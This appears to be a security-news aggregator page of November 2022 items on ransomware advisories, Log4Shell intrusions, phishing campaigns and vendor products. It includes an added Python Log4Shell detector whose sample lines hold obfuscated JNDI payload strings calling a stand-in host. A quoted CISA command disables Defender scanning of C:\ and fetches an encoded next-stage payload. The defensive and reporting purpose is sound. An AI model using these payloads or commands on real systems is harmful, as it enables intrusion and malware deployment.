                2022-11-17 https://www.helpnetsecurity.com/2022/11/17/bitsight-third-party-vulnerability-detection/

                BitSight has enhanced its Third-Party Risk Management (TPRM) platform to provide additional insights to customers, helping them to more proactively detect and mitigate vulnerabilities and exposure across their third-party vendor ecosystem. BitSight also expanded its Fourth-Party Risk Management solution to increase visibility into risk across an organization’s extended supply chain and to help manage and prioritize mitigation efforts more efficiently. Third-Party Vulnerability Detection helps organizations to uncover, attribute, and prioritize vulnerabilities and exposures. Risk managers … More

                The post BitSight Third-Party Vulnerability Detection increases visibility into vendor risk appeared first on Help Net Security.


Autosummary: “When Zero Days and other major security events occur, organizations struggle to quickly understand, remediate, and report on their exposure,” said Vanessa Jankowski, Vice President and General Manager of Third Party Risk Management, BitSight.


                Resecurity collaborates with CyberKSA to combat threats targeting the industry

                industry
                2022-11-17 https://www.helpnetsecurity.com/2022/11/17/resecurity-cyberksa/

                Resecurity has partnered with Saudi Cybersecurity Company (CyberKSA), a cybersecurity provider in the Kingdom of Saudi Arabia (KSA). The partnership will allow CyberKSA to offer award-winning cyber threat intelligence (CTI), dark web monitoring (DWM), digital risk management (DRM), fraud prevention (FP) and identity protection (IDP) products to consumer and enterprise organizations. The comprehensive portfolio of solutions will accelerate specialized offerings for MSSPs/ISPs and large enterprise customers looking to streamline their cybersecurity operations across their environment. … More

                The post Resecurity collaborates with CyberKSA to combat threats targeting the industry appeared first on Help Net Security.


Autosummary: To reduce fragmentation, Resecurity is following a unified platform-as-a-service (PaaS) model, combining critical components of security service edge (SSE) and a scalable data lake containing a massive volume of actionable cyber threat intelligence data and associated telemetry useful for implementation into security information and event management (SIEM), security operations center (SOC), cyber fusion center (CFS) and third-party systems and applications.


                Palo Alto Networks PAN-OS 11.0 Nova protects organizations against zero-day threats

                exploits
                2022-11-17 https://www.helpnetsecurity.com/2022/11/17/palo-alto-networks-pan-os-11-0-nova/

                Cyber threats continue to increase in volume and complexity with threat actors developing new ways to avoid detection — including highly evasive malware. To help organizations outpace these evolving threats, Palo Alto Networks has announced PAN-OS 11.0 Nova, unleashing 50+ product updates and innovations. Amongst them are the new Advanced WildFire cloud-delivered security service that brings protection against evasive malware and the Advanced Threat Prevention (ATP) service which now protects against zero-day injection attacks. “We’ve … More

                The post Palo Alto Networks PAN-OS 11.0 Nova protects organizations against zero-day threats appeared first on Help Net Security.


Autosummary: Integration of next-generation CASB: Palo Alto Networks next-generation Cloud Access Security Broker (CASB), natively integrated with Nova and Prisma SASE, now includes all-new SaaS Security Posture Management (SSPM) to help find and eliminate dangerous misconfigurations in 60+ enterprise SaaS apps. In addition to Advanced WildFire and Advanced Threat Prevention, notable innovations in the Nova release include: Simplified and consistent security Web Proxy support: For customers who need to run explicit proxies in their network due to network architecture or compliance requirements, Nova introduces natively integrated proxy capabilities for Palo Alto Networks NGFWs helping to secure web as well as non-web traffic.


                Microsoft fixes bug behind Windows 10 freezes, desktop issues

                exploits
                2022-11-17 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-behind-windows-10-freezes-desktop-issues/
Microsoft has resolved a known issue triggering errors and temporarily causing the taskbar and desktop to disappear on Windows 10 systems. [...]


                Iranian Hackers Compromised a U.S. Federal Agency’s Network Using Log4Shell Exploit

                exploits
                2022-11-17 https://thehackernews.com/2022/11/iranian-hackers-compromised-us-federal.html
Iranian government-sponsored threat actors have been blamed for compromising a U.S. federal agency by taking advantage of the Log4Shell vulnerability in an unpatched VMware Horizon server. The details, which were shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), come in response to incident response efforts undertaken by the authority from mid-June through mid-July 2022

Autosummary: "Cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence," CISA noted.
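Nearly a year after disclosure, the first thing to establish in an incident like this one is when the Log4Shell probes arrived and which callback scheme they used, and naive searches for the literal "${jndi:" miss the obfuscated forms that were in wide use. The detector below is an added example, not code from The Hacker News article or from CISA. It resolves two documented Log4j lookup features that attackers nested inside the payload to hide the keyword, the case lookups ${lower:x} / ${upper:x} and the default-value syntax ${name:-x} (which yields x when the lookup is undefined), and then matches the normalised string. The sample log lines are constructed.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookup strings in log or request data,
including common obfuscations of the literal "${jndi:".

Added example; not code from the article or from CISA. The sample lines are
constructed. Normalisation covers nested ${lower:x}/${upper:x} lookups and the
${name:-x} default-value syntax; both are documented Log4j lookup behaviours.
"""
import re
from typing import List, Optional, Tuple

_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_JNDI_SCHEME = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9]+)", re.IGNORECASE)


def normalise(payload: str) -> str:
    """Resolve innermost lookups until the string stops changing.

    Matching later is case-insensitive, so the case conversion itself is not
    applied; only the wrapped text is kept. The loop is bounded so hostile input
    cannot spin it indefinitely.
    """
    for _ in range(20):
        before = payload
        payload = _CASE_LOOKUP.sub(lambda m: m.group(1), payload)
        payload = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), payload)
        if payload == before:
            break
    return payload


def jndi_scheme(payload: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, ldaps, rmi, dns, ...) if a lookup is present."""
    m = _JNDI_SCHEME.search(normalise(payload))
    return m.group(1).lower() if m else None


def is_log4shell_probe(payload: str) -> bool:
    return _JNDI.search(normalise(payload)) is not None


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        scheme = jndi_scheme(line)
        if scheme:
            hits.append((n, scheme))
    return hits


# Constructed sample: a benign request, a plain probe, and two obfuscated probes
# carried in the User-Agent field.
SAMPLE_LINES = [
    '203.0.113.10 - - "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${lower:rmi}://198.51.100.7/x}"',
    '198.51.100.7 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/h}"',
]

if __name__ == "__main__":
    for n, scheme in scan_lines(SAMPLE_LINES):
        print(f"line {n}: JNDI lookup via {scheme}")
```

The scheme matters for triage: ldap and rmi lookups are the ones that fetch and execute a remote class, while dns lookups are usually scanners confirming the vulnerability exists. Run the scanner over Horizon's web-tier logs and any other front end that passed attacker-controlled headers to a Log4j-backed application.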


                Chinese Hackers Using 42,000 Imposter Domains in Massive Phishing Attack Campaign

                financial
                2022-11-17 https://thehackernews.com/2022/11/chinese-hackers-using-42000-imposter.html
A China-based financially motivated group is leveraging the trust associated with popular international brands to orchestrate a large-scale phishing campaign dating back as far as 2019. The threat actor, dubbed Fangxiao by Cyjax, is said to have registered over 42,000 imposter domains, with initial activity observed in 2017. "It targets businesses in multiple verticals including retail, banking,

Autosummary: More than 400 organizations, including Emirates, Shopee, Unilever, Indomie, Coca-Cola, McDonald's, and Knorr, are being imitated as part of the criminal scheme, the researchers said.


                QBot phishing abuses Windows Control Panel EXE to infect devices

                financial
                2022-11-17 https://www.bleepingcomputer.com/news/security/qbot-phishing-abuses-windows-control-panel-exe-to-infect-devices/
Phishing emails distributing the QBot malware are using a DLL hijacking flaw in the Windows 10 Control Panel to infect computers, likely as an attempt to evade detection by security software. [...]

Autosummary: However, when a user attempts to open this fake folder, the shortcut launches the Windows 10 Control Panel executable, control.exe, which is stored in the ISO file, as shown below.


                AA22-321A: #StopRansomware: Hive Ransomware

                exploits ransomware
                2022-11-17 https://us-cert.cisa.gov/ncas/alerts/aa22-321a
                Original release date: November 17, 2022

                Summary

                Actions to Take Today to Mitigate Cyber Threats from Ransomware:

                • Prioritize remediating known exploited vulnerabilities.
• Enable and enforce multifactor authentication with strong passwords.
                • Close unused ports and remove any application not deemed necessary for day-to-day operations.

                Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

                The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known Hive IOCs and TTPs identified through FBI investigations as recently as November 2022.

                FBI, CISA, and HHS encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. Victims of ransomware operations should report the incident to their local FBI field office or CISA.

                Download the PDF version of this report: pdf, 852.9 kb.

                Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK

Autosummary: From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH). Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks.

Initial access, Exploit Public-Facing Application [T1190]: Hive actors gain access to victim networks by exploiting the following Microsoft Exchange vulnerabilities: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-42321. Hive actors have also gained initial access by distributing phishing emails with malicious attachments [T1566.001] and by exploiting the following vulnerabilities against Microsoft Exchange servers [T1190]:
• CVE-2021-31207 - Microsoft Exchange Server Security Feature Bypass Vulnerability
• CVE-2021-34473 - Microsoft Exchange Server Remote Code Execution Vulnerability
• CVE-2021-34523 - Microsoft Exchange Server Privilege Escalation Vulnerability

After gaining access, Hive ransomware attempts to evade detection by executing processes to identify processes related to backups, antivirus/anti-spyware, and file copying and then terminating those processes to facilitate file encryption [T1562].

Mitigations: FBI, CISA, and HHS recommend organizations, particularly in the HPH sector, implement the following to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Hive ransomware:
• Verify Hive actors no longer have access to the network.
• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
• Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.
In addition, FBI, CISA, and HHS urge all organizations to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.

Regardless of whether you or your organization decide to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to your local FBI field office, or to CISA at report@cisa.gov or (888) 282-0870. However, the FBI, CISA, and HHS understand that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees, and customers. The FBI may seek the following information that you determine you can legally share, including:
• Recovered executable files
• Live random access memory (RAM) capture
• Images of infected systems
• Malware samples
• IP addresses identified as malicious or suspicious
• Email addresses of the attackers
• A copy of the ransom note
• Ransom amount
• Bitcoin wallets used by the attackers
• Bitcoin wallets used to pay the ransom
• Post-incident forensic reports

Disclaimer: Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.


                Previously unidentified ARCrypter ransomware expands worldwide

                exploits ransomware
                2022-11-17 https://www.bleepingcomputer.com/news/security/previously-unidentified-arcrypter-ransomware-expands-worldwide/
                A previously unknown "ARCrypter" ransomware that compromised key organizations in Latin America is now expanding its attacks worldwide. [...] "

                Autosummary: (The randomly-named payload dropped in a newly created folder. Source: BlackBerry) The ARCrypter payload then creates persistence by adding the following registry key: “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityUpdate”. Next, the malware deletes all Shadow Volume Copies to prevent easy data restoration, modifies network settings to secure stable connectivity, and then encrypts all files except for the types shown below. "


                FBI: Hive ransomware extorted $100M from over 1,300 victims

                exploits ransomware
                2022-11-17 https://www.bleepingcomputer.com/news/security/fbi-hive-ransomware-extorted-100m-from-over-1-300-victims/
                The Federal Bureau of Investigation (FBI) said today that the notorious Hive ransomware gang has successfully extorted roughly $100 million from over a thousand companies since June 2021. [...] "

                Autosummary: "


                Two public schools in Michigan hit by a ransomware attack

                exploits ransomware
                2022-11-17 https://securityaffairs.co/wordpress/138677/cyber-crime/public-schools-michigan-ransomware.html

                Public schools in two Michigan counties were forced to halt their activities, including lessons, after a ransomware attack. Public schools in Jackson and Hillsdale counties, Michigan, reopened after a two-day closure caused by a ransomware attack that hit their systems. The public schools started experiencing a systems outage affecting critical operating […]

                The post Two public schools in Michigan hit by a ransomware attack appeared first on Security Affairs.

                "

                Autosummary: "


                Phishing kit impersonates well-known brands to target US shoppers

                financial
                2022-11-17 https://www.bleepingcomputer.com/news/security/phishing-kit-impersonates-well-known-brands-to-target-us-shoppers/
                A sophisticated phishing kit has been targeting North Americans since mid-September, using lures focused on holidays like Labor Day and Halloween. [...] "

                Autosummary: (Fake user testimonials on the survey pages. Source: Akamai) After "winning" the prize, the victim is requested to cover the shipping costs for receiving the prize, for which they need to enter their payment card details. "


                Micron Authenta enhancements boost end-to-end cloud services across the IoT ecosystem

                industry
                2022-11-16 https://www.helpnetsecurity.com/2022/11/16/micron-technology-authenta/

                Micron Technology expands portfolio for its silicon root-of-trust solution, Authenta, making its cloud-based internet of things (IoT) security offerings more widely accessible. Micron is enabling Authenta in a family of Serial Peripheral Interface NOR (SPI-NOR) devices with increased density and packaging options and unveiling the Authenta Cloud Platform to help enterprises deploy and scale trust-based security at the intelligent edge. The company is also collaborating with security solutions expert Swissbit AG and new customer SanCloud … More

                The post Micron Authenta enhancements boost end-to-end cloud services across the IoT ecosystem appeared first on Help Net Security.

                "

                Autosummary: Swissbit, a leading European security and memory solution provider for IoT applications, and Micron are also now collaborating to embed Authenta technology in Swissbit’s security and storage solutions for IoT and industrial markets — bringing Micron’s unique silicon root-of-trust security features to Swissbit’s broad base of customers across areas such as industrial automation, automotive, IoT, medical, networking and communication. "


                Microsoft Supply Chain Platform helps organizations fix logistics and inventory problems

                industry
                2022-11-16 https://www.helpnetsecurity.com/2022/11/16/microsoft-supply-chain-platform-helps-organizations-fix-logistics-and-inventory-problems/

                Microsoft announced the Microsoft Supply Chain Platform, which helps organizations maximize their supply chain data estate investment with an open approach, bringing the best of Microsoft AI, collaboration, low-code, security and SaaS applications in a composable platform. The company also announced the preview of Microsoft Supply Chain Center, a ready-made command center for supply chain visibility and transformation and part of the Microsoft Supply Chain Platform. Supply Chain Center is designed to work natively with … More

                The post Microsoft Supply Chain Platform helps organizations fix logistics and inventory problems appeared first on Help Net Security.

                "

                Autosummary: In addition, to help customers find the best solution for their supply chain needs, Microsoft will continue to work with solution providers such as Blue Yonder, Cosmo Tech, Experlogix, Flintfox, inVia Robotics, K3, O9 Solutions, SAS, Sonata, To-Increase Software and many more. Accelerating business agility with the Microsoft Supply Chain Center At the core of the Supply Chain Platform is the Microsoft Supply Chain Center, now available in preview, which provides a command center experience for practitioners to harmonize data from across existing infrastructure supply chain systems, such as data from Dynamics 365, and other ERP providers, including SAP and Oracle, along with standalone supply chain systems. "


                Alif Semiconductor partners with Telit to develop and deploy IoT edge devices

                industry
                2022-11-16 https://www.helpnetsecurity.com/2022/11/16/alif-semiconductor-telit/

                Alif has collaborated with Telit to deliver developer kits that provide cloud-connected hardware and software reference designs for a wide variety of distributed and IoT edge applications. The kits focus on connected AI/ML-enhanced vision, voice, vibration, and sensor applications such as AI cameras, smart home, city infrastructure, biometric access control, and wearables. The kits leverage the Alif Ensemble family of microcontrollers (MCUs) and fusion processors. Ensemble devices utilize innovative aiPM power management technology that feature … More

                The post Alif Semiconductor partners with Telit to develop and deploy IoT edge devices appeared first on Help Net Security.

                "

                Autosummary: "


                Rallying cybersecurity and healthcare IT to support patient safety

                ciber
                2022-11-16 https://www.helpnetsecurity.com/2022/11/16/cyber-physical-systems-healthcare/

                The expansion of cyber-physical systems in healthcare, particularly the IP “heartbeats” dispersed across hospital networks, has stretched cybersecurity beyond its IT legacy of monitoring for downed email and site uptimes at a clinic. As we look to expedite applying cybersecurity to protect the field of medicine and its evolving cyber-physical nature, patient safety should be our guiding star. Healthcare organizations already understand the priority; patient safety and the Hippocratic Oath guide the work of medical … More

                The post Rallying cybersecurity and healthcare IT to support patient safety appeared first on Help Net Security.

                "

                Autosummary: Though, to be fair, medical professionals are usually granted ample resources to win the battle against patient disease, while hospitals’ IT teams often lack the people, processes, and technology support they need to foil ransomware, device hacking and other cybersecurity threats. As in healthcare, there is no substitute for a human in cybersecurity: a human that knows the network, knows the patient, knows the attackers, etc. For example: to date, consumer health monitoring apps have introduced unacceptable levels of risk to the medical community since they impact patient safety (inaccurate blood pressure measurement, etc.). "


                5 use cases with a malware sandbox

                exploits
                2022-11-16 https://www.helpnetsecurity.com/2022/11/16/5-use-cases-with-a-malware-sandbox/

                Malware attacks are commonplace today, executing within minutes and causing damage for weeks or months. Rapid detection and swift, effective incident response are essential in this situation. Today we will discuss five use cases of how a malware sandbox can help, so you can avoid any threats and find out the truth behind insidious files. What is a malware sandbox? Any company’s security system involves several layers of protection. A sandbox is one of the … More

                The post 5 use cases with a malware sandbox appeared first on Help Net Security.

                "

                Autosummary: Once the file is opened, you’ve installed malware that can steal sensitive information, or it can be a part of a more significant attack, for example, ransomware. Locale change analysis: several malware programs stop working if the system lacks a certain language, time, or currency. For example, in the Raccoon Stealer sample, all processes were terminated if you selected the Belarus locale (be-BY). A simple change of the locale brought good results: in one case, the malware doesn’t run, and in the other, it shows its malicious properties. "


                CIS SecureSuite Membership: Leverage proven best practices to improve cybersecurity

                ciber
                2022-11-16 https://www.helpnetsecurity.com/2022/11/16/cis-securesuite-membership-video/

                Whether you’re facing a security audit or interested in configuring systems securely, CIS SecureSuite Membership is here to help. CIS SecureSuite provides thousands of organizations with access to an effective and comprehensive set of cybersecurity resources and tools to implement the CIS Critical Security Controls (CIS Controls) and CIS Benchmarks. Track compliance with industry frameworks, secure systems with more than 100 configuration guides, and more, all with one powerful Membership.

                The post CIS SecureSuite Membership: Leverage proven best practices to improve cybersecurity appeared first on Help Net Security.

                "

                Autosummary: "


                Electronics repair technicians snoop on your data

                industry
                2022-11-16 https://www.helpnetsecurity.com/2022/11/16/computer-smartphone-repair-data-privacy/

                When your computer or smartphone needs repairing, can you trust repair technicians not to access or steal your personal data? According to the results of recent research by scientists at the University of Guelph, Canada, you shouldn’t. Granted, they tested only 16 repair service providers with rigged devices, but in six cases technicians snooped on customers’ data and in two they copied the data to external devices. Oh, and most of them tried to cover … More

                The post Electronics repair technicians snoop on your data appeared first on Help Net Security.

                "

                Autosummary: First they asked 18 repair service providers – national (big-box stores), regional (stores of a larger chain), local (mom-and-pop shops), and device manufacturers – whether they have a privacy policy or have set up controls to protect device owners’ personal data from snooping technicians, and found that most have not. "


                US govt: Iranian hackers breached federal agency using Log4Shell exploit

                exploits
                2022-11-16 https://www.bleepingcomputer.com/news/security/us-govt-iranian-hackers-breached-federal-agency-using-log4shell-exploit/
                The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware. [...] "

                Autosummary: "


                Magento stores targeted in massive surge of TrojanOrders attacks

                exploits
                2022-11-16 https://www.bleepingcomputer.com/news/security/magento-stores-targeted-in-massive-surge-of-trojanorders-attacks/
                At least seven hacking groups are behind a massive surge in "TrojanOrders" attacks targeting Magento 2 websites, exploiting a vulnerability that allows the threat actors to compromise vulnerable servers. [...] "

                Autosummary: (Diagram of detected "TrojanOrders" attacks. Source: Sansec) The TrojanOrders attack: TrojanOrders is the name of an attack that exploits the critical Magento 2 CVE-2022-24086 vulnerability, allowing unauthenticated attackers to execute code and inject RATs (remote access trojans) on unpatched websites. "


                AA22-320A: Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester

                government
                2022-11-16 https://us-cert.cisa.gov/ncas/alerts/aa22-320a
                Original release date: November 16, 2022

                Summary

                From mid-June through mid-July 2022, CISA conducted an incident response engagement at a Federal Civilian Executive Branch (FCEB) organization where CISA observed suspected advanced persistent threat (APT) activity. In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence. CISA and the Federal Bureau of Investigation (FBI) assess that the FCEB network was compromised by Iranian government-sponsored APT actors.

                CISA and FBI are releasing this Cybersecurity Advisory (CSA) providing the suspected Iranian government-sponsored actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help network defenders detect and protect against related compromises.

                CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities. If suspected initial access or compromise is detected based on IOCs or TTPs described in this CSA, CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems (including the DC), and audit privileged accounts. All organizations, regardless of identified evidence of compromise, should apply the recommendations in the Mitigations section of this CSA to protect against similar malicious cyber activity.

                For more information on Iranian government-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and FBI’s Iran Threats webpage.


                Autosummary: The actors’ exploit payload ran the following PowerShell command [T1059.001] that added an exclusion tool to Windows Defender [T1562.001]:
                powershell try{Add-MpPreference -ExclusionPath "C:\"; Write-Host "added-exclusion"} catch {Write-Host "adding-exclusion-failed" }; powershell -enc "$BASE64 encoded payload to download next stage and execute it"
                The exclusion tool allowlisted the entire C:\ drive, enabling threat actors to download tools to the C:\ drive without virus scans. It is possible, but was not observed, that the threat actors configured a custom domain, or used other Ngrok tunnel domains, wildcarded here as *.ngrok[.]com, *.ngrok[.]io, ngrok.*.tunnel[.]com, or korgn.*.lennut[.]com. After obtaining initial access and installing XMRig on the VMware Horizon server, the actors used RDP [T1021.001] and the built-in Windows user account DefaultAccount [T1078.001] to move laterally [TA0008] to a VMware VDI-KMS host. Domain computer enumeration command from the advisory:
                Powershell.exe get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address >
                The threat actors also changed the password for the local administrator account [T1098] on several hosts as a backup should the rogue domain administrator account get detected and terminated. If system, software, or web browser credential disclosure is a significant concern, technical controls, policy, and user training may be used to prevent storage of credentials in improper locations [M1027].
                Detection: Monitor for newly constructed processes and/or command-lines that execute from svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows [DS0009]. Detection: Monitor for newly constructed scheduled jobs by enabling the Microsoft-Windows-TaskScheduler/Operational setting within the event logging service [DS0003]. Other factors, such as access patterns (e.g., multiple systems over a relatively short period of time) and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP [DS0028]. Detection: Monitor for newly constructed network connections associated with pings/scans that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement [DS0029]. "


                Updated RapperBot malware targets game servers in DDoS attacks

                exploits
                2022-11-16 https://www.bleepingcomputer.com/news/security/updated-rapperbot-malware-targets-game-servers-in-ddos-attacks/
                The Mirai-based botnet "RapperBot" has re-emerged via a new campaign that infects IoT devices for DDoS (Distributed Denial of Service) attacks against game servers. [...] "

                Autosummary: Supported commands: Keep-Alive/Do nothing; Stop all DoS attacks and terminate the client; Perform a DoS attack; Stop all DoS attacks; Restart Telnet brute forcing; Stop Telnet brute forcing. The malware tries to brute force devices using common weak credentials from a hardcoded list, whereas previously, it fetched a list from the C2. "


                F5 fixed 2 high-severity Remote Code Execution bugs in its products

                exploits
                2022-11-16 https://securityaffairs.co/wordpress/138631/security/2-rce-f5-products.html

                Researchers at cybersecurity firm Rapid7 have identified several vulnerabilities and other potential security issues affecting F5 products. Rapid7 researchers discovered several vulnerabilities in F5 BIG-IP and BIG-IQ devices running a customized distribution of CentOS. The experts also discovered several bypasses of security controls that the security vendor F5 does not recognize as exploitable vulnerabilities. The […]

                The post F5 fixed 2 high-severity Remote Code Execution bugs in its products appeared first on Security Affairs.

                "

                Autosummary: Below are the bypasses of security controls that F5 rejected as not exploitable:
                ID1145045 – Local privilege escalation via bad UNIX socket permissions (CWE-269)
                ID1144093 – SELinux bypass via incorrect file context (CWE-732)
                ID1144057 – SELinux bypass via command injection in an update script (CWE-78) "


                Open banking: Tell me what you buy, and I’ll tell you who you are

                financial
                2022-11-16 https://www.welivesecurity.com/2022/11/16/open-banking-tell-me-what-you-buy-ill-tell-you-who-you-are/

                The convenience with which you manage all your financial wants and needs may come at a cost

                The post Open banking: Tell me what you buy, and I’ll tell you who you are appeared first on WeLiveSecurity

                "

                Autosummary: The value of our data is something we, as a society, talk about on a daily basis, and we can easily see how mainly big companies acquire services in different areas: health, banking, tech products, marketplaces, all at once. I mostly cook, rather than go to restaurants (but, when I did go to a restaurant, it was clear where and how much I spent), and even that I usually book long-distance bus rides. In short, banking data reveals a lot about our lives. Many regulators and lawmakers around the world are beginning or continuing to work on implementing open banking, obliging banks to coordinate information sharing and, as those pushing for these policies believe, to drive innovation, competition, and transparency within the traditionally more conservative banking sector. "


                Phosphorus and Redapt join forces to deliver xIoT security to US enterprises

                industry
                2022-11-15 https://www.helpnetsecurity.com/2022/11/15/phosphorus-redapt/

                The new Phosphorus and Redapt partnership will see the two companies jointly delivering a new generation of xIoT security solutions in the US to meet growing enterprise demand for xIoT attack surface management and remediation capabilities. “Enterprises face a growing risk of cyber attacks because of vulnerable IoT and OT endpoints which traditional security companies can’t protect,” said Kal Gajera, Director of North America Channels at Phosphorus. “These attacks can lead to a full compromise … More

                The post Phosphorus and Redapt join forces to deliver xIoT security to US enterprises appeared first on Help Net Security.

                "

                Autosummary: "


                Immersive Labs helps UK Ministry of Defence identify qualified candidates to fill vital cybersecurity roles

                ciber
                2022-11-15 https://www.helpnetsecurity.com/2022/11/15/immersive-labs-uk-ministry-of-defence/

                Immersive Labs announced that the UK Ministry of Defence (MOD) has deployed Immersive Labs Cyber Pro, Crisis Sim, and AppSec solutions to upskill individuals and teams across its organization to confront the latest cyber threats, prove cyber readiness, and identify cybersecurity talent to fill open roles. The integration supports the MOD’s new Digital Skills for Defence programme to build stronger, digital skills across defence and follows a successful trial by the UK Army. The partnership … More

                The post Immersive Labs helps UK Ministry of Defence identify qualified candidates to fill vital cybersecurity roles appeared first on Help Net Security.

                "

                Autosummary: Immersive Labs is trusted by the world’s largest organizations and governments, including Citi, Pfizer, Daimler, Humana, Atos, HSBC, and the UK National Health Service. "


                Skyworks collaborates with MediaTek to offer end-to-end 5G automotive solutions

                industry
                2022-11-15 https://www.helpnetsecurity.com/2022/11/15/skyworks-solutions-mediatek/

                Skyworks announced that the company has engaged with MediaTek to offer a complete modem-to-antenna automotive-grade 5G solution. This 5G New Radio Sky5A RF front-end solution will accelerate the deployment of this protocol across an array of automotive OEM and consumer service offerings. “The rollout of 5G is reshaping the automotive market with a variety of safety and entertainment telematics applications to improve the driving experience,” said Martin Lin, deputy general manager of the Wireless Communications … More

                The post Skyworks collaborates with MediaTek to offer end-to-end 5G automotive solutions appeared first on Help Net Security.

                "

                Autosummary: "


                Critical vulnerability in Spotify’s Backstage discovered, patched

                exploits
                2022-11-15 https://www.helpnetsecurity.com/2022/11/15/spotify-backstage-vulnerability/

                A critical unauthenticated remote code execution vulnerability in Spotify’s Backstage project has been found and fixed, and developers are advised to take immediate action in their environments. What is Backstage? Having more than 19,000 stars on Github, Backstage is one of the most popular open-source platforms for building developer portals and is in widespread use by Spotify, American Airlines, Netflix, Splunk, Fidelity Investments, Epic Games, Palo Alto Networks and many others. It unifies all infrastructure … More

                The post Critical vulnerability in Spotify’s Backstage discovered, patched appeared first on Help Net Security.

                "

                Autosummary: "


                Creating a holistic ransomware strategy

                exploits ransomware
                2022-11-15 https://www.helpnetsecurity.com/2022/11/15/ransomware-recovery-strategies-video/

                Recent scientific research into the psychological effects of a ransomware crisis on both organizations and individuals revealed the deep marks that a ransomware crisis leaves on all those affected. It also shows how their IT and security teams can turn into disarray long after the crisis itself has passed. Zerto’s 2022 Ransomware Strategy Survey revealed gaps in companies’ data protection and ransomware strategies that they will want to address to reduce their risk of interrupting … More

                The post Creating a holistic ransomware strategy appeared first on Help Net Security.

                "

                Autosummary: "


                Chinese hackers target government agencies and defense orgs

                government
                2022-11-15 https://www.bleepingcomputer.com/news/security/chinese-hackers-target-government-agencies-and-defense-orgs/
                The Chinese espionage APT (advanced persistent threat), tracked as "Billbug" (aka Thrip, or Lotus Blossom), is currently running a 2022 campaign targeting government agencies and defense organizations in multiple Asian countries. [...] "

                Autosummary: Among them are: AdFind, Winmail, WinRAR, Ping, Tracert, Route, NBTscan, Certutil, and Port Scanner. These tools help hackers blend in with innocuous daily activity, avoid suspicious log traces or raising alarms on security tools, and generally make attribution efforts harder. "


                SSVC: Prioritization of vulnerability remediation according to CISA

                exploits
                2022-11-15 https://www.helpnetsecurity.com/2022/11/15/vulnerability-prioritization-remediation-cisa/

                Given that 2021 was a record year for new vulnerabilities published and threat actors became better at weaponizing vulnerabilities, timely and well-judged vulnerability prioritization and remediation are a goal all organizations should aspire to achieve. The US Cybersecurity and Infrastructure Security Agency (CISA) regularly publishes lists of the most exploited vulnerabilities and keeps a regularly updated Known Exploited Vulnerabilities catalog everyone is welcome to use, but as helpful as these resources are, organizations usually stumble … More

                The post SSVC: Prioritization of vulnerability remediation according to CISA appeared first on Help Net Security.

                "

